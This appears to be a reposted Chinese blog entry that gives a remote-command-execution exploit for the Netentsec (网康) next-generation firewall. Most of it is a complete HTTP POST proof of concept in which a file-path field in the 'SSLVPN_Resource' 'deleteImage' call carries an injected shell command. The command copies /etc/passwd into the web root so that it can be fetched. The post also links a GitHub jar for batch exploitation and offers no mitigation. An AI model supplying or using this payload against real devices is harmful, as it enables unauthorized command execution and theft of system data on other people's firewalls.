当前位置:   article > 正文

网康科技-下一代防火墙 rce_网康下一代防火墙 命令执行批量rce

网康下一代防火墙 命令执行批量rce

目录

         漏洞利用

         POC

然后访问:/test_test.txt


web安全学习了解: web渗透测试            
官网: 宣紫科技       

 漏洞利用

利用jar包: https://github.com/Yang0615777/PocList/blob/main/QiAnXin-WangKangFirewall-RCE.jar

POC

  1. POST /directdata/direct/router HTTP/1.1
  2. Host: x.x.x.x
  3. Connection: close
  4. Cache-Control: max-age=0
  5. sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
  6. sec-ch-ua-mobile: ?0
  7. Upgrade-Insecure-Requests: 1
  8. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
  9. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  10. Sec-Fetch-Site: cross-site
  11. Sec-Fetch-Mode: navigate
  12. Sec-Fetch-User: ?1
  13. Sec-Fetch-Dest: document
  14. Referer: https://x.x.x.x/
  15. Accept-Encoding: gzip, deflate
  16. Accept-Language: zh-CN,zh;q=0.9
  17. Cookie: PHPSESSID=d6o8gdugrhmvf2sq18ojhj50p3; ys-active_page=s%3A
  18. Content-Length: 178
  19. {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test_test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

然后访问:/test_test.txt

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/花生_TL007/article/detail/150748
推荐阅读
相关标签
  

闽ICP备14008679号